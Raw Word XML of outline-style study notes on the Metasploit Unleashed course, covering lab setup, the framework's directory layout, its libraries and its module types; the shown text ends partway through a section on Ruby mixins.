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E377" w14:textId="6660EA25" w:rsidR="00603A74" w:rsidRDefault="00001EF9" w:rsidP="00F51289">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit Unleashed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F038B2C" w14:textId="24412EDA" w:rsidR="00001EF9" w:rsidRDefault="00001EF9" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction to Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AF2347" w14:textId="1C130AC3" w:rsidR="00001EF9" w:rsidRDefault="00001EF9" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit Unleash Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21908A0C" w14:textId="7BA161F0" w:rsidR="00001EF9" w:rsidRDefault="00001EF9" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Prepare Metasploit Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793727CC" w14:textId="679801C6" w:rsidR="00001EF9" w:rsidRDefault="00001EF9" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Hard Drive Space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D88FFEA" w14:textId="7C5EE928" w:rsidR="00001EF9" w:rsidRDefault="00001EF9" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>large file system – cannot use FAT32, must use NTFS, ext3, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6023A6E1" w14:textId="77445A39" w:rsidR="00001EF9" w:rsidRDefault="00001EF9" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144635F2" w14:textId="19509AE9" w:rsidR="00001EF9" w:rsidRDefault="00001EF9" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4453AD58" w14:textId="4E486A63" w:rsidR="00001EF9" w:rsidRDefault="00001EF9" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>only use NAT or Host-only mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B263074" w14:textId="046D6D5C" w:rsidR="008C62BE" w:rsidRDefault="008C62BE" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75091B97" w14:textId="56BF6B74" w:rsidR="008C62BE" w:rsidRDefault="0005276B" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="008C62BE" w:rsidRPr="00BF15BA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="406F5292" w14:textId="3769B114" w:rsidR="008C62BE" w:rsidRDefault="008C62BE" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBB0BCE" w14:textId="33A7CCE7" w:rsidR="008C62BE" w:rsidRDefault="008C62BE" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Written in Ruby</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476C9362" w14:textId="4853B6BE" w:rsidR="008C62BE" w:rsidRDefault="008C62BE" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Understanding the Metasploit Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DB0233" w14:textId="5C7A9098" w:rsidR="008C62BE" w:rsidRDefault="008C62BE" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit-framework package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6509F0AE" w14:textId="24F72D01" w:rsidR="008C62BE" w:rsidRDefault="008C62BE" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>/usr/share/Metasploit-framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398645B9" w14:textId="0401305E" w:rsidR="008C62BE" w:rsidRDefault="008C62BE" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>DATA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA9265E" w14:textId="387FA0E6" w:rsidR="008C62BE" w:rsidRDefault="008C62BE" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>contains editable files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134C57D9" w14:textId="185AD2B8" w:rsidR="008C62BE" w:rsidRDefault="008C62BE" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F529A82" w14:textId="630783FF" w:rsidR="008C62BE" w:rsidRDefault="008C62BE" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Lib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325FC333" w14:textId="1963EAAC" w:rsidR="008C62BE" w:rsidRDefault="008C62BE" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>meat of framework code base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292E8A20" w14:textId="4EF71C64" w:rsidR="008C62BE" w:rsidRDefault="008C62BE" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79090BD4" w14:textId="5DA87967" w:rsidR="008C62BE" w:rsidRDefault="008C62BE" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>actual MSF payload directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23465EDA" w14:textId="5F10443C" w:rsidR="008C62BE" w:rsidRDefault="008C62BE" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Plugins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E16A3FE" w14:textId="06A4DA3C" w:rsidR="008C62BE" w:rsidRDefault="008C62BE" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D54E1C5" w14:textId="7EC31A4E" w:rsidR="008C62BE" w:rsidRDefault="008C62BE" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Meterpreter, among others</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD523F7" w14:textId="5EBC5078" w:rsidR="008C62BE" w:rsidRDefault="008C62BE" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7967EEB8" w14:textId="449CF998" w:rsidR="008C62BE" w:rsidRDefault="008C62BE" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>command-line utilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55201396" w14:textId="4DA5D62F" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit Libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E16AFA6" w14:textId="456D5A56" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>REX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2F77A0" w14:textId="1C025D8E" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>basic library, most tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CBC3C4" w14:textId="504639D6" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>sockets, protocols, text transformations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3125B556" w14:textId="64F08514" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>SSL, SMB, HTTP, XOR, Base64, Unicode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2E2B4D" w14:textId="04E7CF84" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>MSF::CORE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C10A86F" w14:textId="1288A967" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>basic API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD7A2CC" w14:textId="74365408" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>defines Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6342B5E8" w14:textId="541635C6" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>MSF::BASE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7319C232" w14:textId="35E4AD2A" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>friendly API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE16B77" w14:textId="243DABA9" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit Modules and Locations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEF49AF" w14:textId="1C95102E" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">primary module store </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /usr/share/Metasploit-framework/modules/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9A84BD" w14:textId="541078C1" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">custom modules </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ~/.msf4/modules/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F55F27" w14:textId="25EEDC6D" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578B0003" w14:textId="4041F3F0" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>use payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D382045" w14:textId="57F859A9" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Auxiliary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D948980" w14:textId="3A55050E" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>port scanners, fuzzers, sniffers, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAFCC3D" w14:textId="1DD64806" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Payloads, Encoders, Nops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4095BE5C" w14:textId="5152E7E7" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>payloads – code runs remotely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74975B7C" w14:textId="1DCA2FC8" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>encoders – ensure payloads make it to destination intact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7097BA90" w14:textId="42DC5219" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>nops – consistency of payload sizes across exploit attempts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19466B2A" w14:textId="603FDB3A" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Loading Additional Modules Tree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCA1C29" w14:textId="1E312130" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>pass the -m option to load additional modules at runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD3007C" w14:textId="6AD7F59A" w:rsidR="00151E6C" w:rsidRDefault="00151E6C" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>also use loadpath command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F5FDEB" w14:textId="114746DB" w:rsidR="00DF0BAF" w:rsidRDefault="00DF0BAF" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>loadpath &lt;/path/to/modules&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7675F9BD" w14:textId="3251F26E" w:rsidR="00DF0BAF" w:rsidRDefault="00DF0BAF" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit Object Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCE468C" w14:textId="32B615F2" w:rsidR="00DF0BAF" w:rsidRDefault="00DF0BAF" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Understanding the Metasploit Object Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E74BD2F" w14:textId="313443F2" w:rsidR="00DF0BAF" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>all modules are Ruby classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1F78A6" w14:textId="647BD199" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Modules inherit from type-specific class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D24C86C" w14:textId="445AF669" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>type-specific class inherits from the Msf::Module class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ABFEB2" w14:textId="0E8E2889" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>shared common API between modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB5BC20" w14:textId="5D661254" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Payloads are created at runtime from various components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDA06A5" w14:textId="39901C64" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>glue together stagers with stages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689E0CF4" w14:textId="03819C86" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit Mixins and Plugins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4040C7C5" w14:textId="08573BDA" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Ruby</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159FCC53" w14:textId="08EA7E96" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>every class has only one parent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2706FA1D" w14:textId="6F2178AF" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>a class may include many Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721FD6CB" w14:textId="2D37565D" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Modules can add new methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF8F4E4" w14:textId="55D75A77" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
